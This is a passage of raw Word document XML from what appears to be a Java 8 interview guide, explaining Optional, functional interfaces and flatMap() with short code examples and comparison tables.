    <w:p w14:paraId="04E8917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employeeMap.get(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921A40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9D740F"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23085">
          <v:rect id="_x0000_i1715" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A380C"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Reduces Boilerplate Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4DA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ained Optional operations help you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduce nested if-el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 checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770359A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User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56924FD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User::getAddress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E3A6F"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Address::getCity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE47EC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Unknown");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7F752" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95"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16" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF909DA" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00936CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA7110C"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44" w:name="_Toc197867458"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Optional class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="471DB361" w14:textId="0FAFC4D9" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607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Optional Class in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59775EE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purpose of the Optional class is to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 xml:space="preserve"> and provide a more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>expressive, readable, and null-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way to handle optional (i.e., potentially absent) values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53810635"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838F03">
          <v:rect id="_x0000_i1717" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7F8DF"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urposes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53733FC7"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Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07629B0D"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iminates the need for explicit null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2E875"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unintentional dereferencing of null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCCD2F"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Intent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18586782"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gnals clearly that a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be absent (vs returning null, which is implicit and error-prone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12879B21"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PI Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756FD9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method returns Optional&lt;T&gt;, it tells the caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BFB1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may return a value, or it may not — handle both cases."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDCFF9"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upport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5032A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methods like map(), flatMap(), filter() to allow chaining and functional-style operations without breaking the flow with null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B467DF"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1248D9">
          <v:rect id="_x0000_i1718" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501993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aditional vs. Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FF6EC"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ptional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190A60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name = getName(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F5DB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ame != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA642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toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E235D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38602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Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCC8E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getNameOptional();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744039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name.ifPresent(n -&gt; System.out.println(n.toUpperCase()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A57D9"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816FBE">
          <v:rect id="_x0000_i1719" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A190F2D"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27"/>
        <w:gridCol w:w="1682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="54FDCB05" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E68080B"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09478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Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="270A6628"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ptional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="1B5A8993" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27626B6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05BE966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7B9B997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7E4A8A1B" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5C9A4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best practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A967EE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A8EAB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321DCE80" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA1320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avoid bugs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F0A33DB"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5741A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6D3F1AA7" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C87D24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friendly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419AB61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map, filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6748C1C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543EB9D2" w14:textId="0E68770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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424D436" w14:textId="77777777" w:rsidR="00BE2B45" w:rsidRPr="00CE4B95" w:rsidRDefault="00BE2B45">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc197867459"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 8 Functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="7E3D5132" w14:textId="1D6BE330" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E"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8 Functional Interface – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160DE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se interfaces are designed to represent a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making them ideal for use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introduced in Java 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C499CE1"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ECF8A">
          <v:rect id="_x0000_i1721" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F144E23"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9066BDC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566493EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B4C4D"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notated with @FunctionalInterface (optional but recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB0D13"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CD739">
          <v:rect id="_x0000_i1722" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F316959"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75A32DD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10222E8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0A60BFE7"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oSomething(); // only one abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEAAE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DE48CA"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996360">
          <v:rect id="_x0000_i1723" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B390F"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 of Built-in Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE8DFD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614"/>
        <w:gridCol w:w="3514"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="60A95B75" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62DF604A"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2E7DF164"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30A2627E"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B422C8" w:rsidRPr="00CE4B95" w14:paraId="6B26FDA7" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C266F9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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4994F19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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7205FF7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input type T to output type R</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3D3BD27D" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DDE62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8D2609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49CFA00C"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a condition (returns true/false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="11C99BDA" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B06CEF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0F3FA7F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81C53D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s an action on input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="101E8937" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E6CC2D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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7CEC8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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C8BF40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s a value (no input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E82CB6F"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862027">
          <v:rect id="_x0000_i1724" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC353F6"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Functional Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32790146"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ables </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732AC79"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mplifies </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>code readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F9A31"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style in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B036B"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86E7">
          <v:rect id="_x0000_i1725" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF13DC"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 Lambda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3909BFA8"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60A56B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5AC82C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16226BF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94510C" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F6184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90ED469"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F767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664F812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sayHello("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13198936"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B19543"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2600A9" w14:textId="0E0454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26" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C849D3B" w14:textId="77777777" w:rsidR="00A41943" w:rsidRPr="00CE4B95" w:rsidRDefault="00A41943">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="_Toc197867460"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Where can you use FlatMap in a stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="6BC93A0E" w14:textId="097CEB49" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">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Can You Use flatMap() in Java Streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C512BF"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latMap() is used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flatten nested structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as a List&lt;List&lt;T&gt;&gt;, into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single stream of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Stream&lt;T&gt;). It’s very useful in scenarios where each element in a stream produces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CF3F1"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E5B492">
          <v:rect id="_x0000_i1727" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED73421"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for flatMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F785B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ttening Nested Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1B25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String&gt;&gt; namesList = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4A7C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A", "B"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9538C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C", "D")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B0596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628ADA" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08759D2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flatList = namesList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A6704"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46EEBE5F"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00A2C03"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A, B, C, D]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31473F5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List of Objects that Contain Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555B4B0"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140193B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B8D7E4C"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subjects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32EBC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 getter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228BCD51"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5073B7" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717424C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udent&gt; students = ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB38BFC" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760E041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allSubjects = students.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C07D8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 -&gt; s.getSubjects().stream())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9CE92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istinct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA5F9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E2190E6"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litting and Flattening Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0A31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sentences = Arrays.asList("Java 8", "is awesome");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E8E63" w14:textId="77777777" w:rsidR="00313557" w:rsidRPr="00CE4B95" w:rsidRDefault="00313557" w:rsidP="003E1A29">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E959A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words = sentences.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E217F3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entence -&gt; Arrays.stream(sentence.split(" ")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B0EA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70D8E5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Java, 8, is, awesome]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B1EA9"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4D0AA7">
          <v:rect id="_x0000_i1728" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31741EEC"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1041"/>
        <w:gridCol w:w="1917"/>
      </w:tblGrid>
      <w:tr w:rsidR="002240EB" w:rsidRPr="00CE4B95" w14:paraId="6358643E" w14:textId="77777777" w:rsidTr="00313557">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED3224B"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4D779EE"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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296D5B68"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
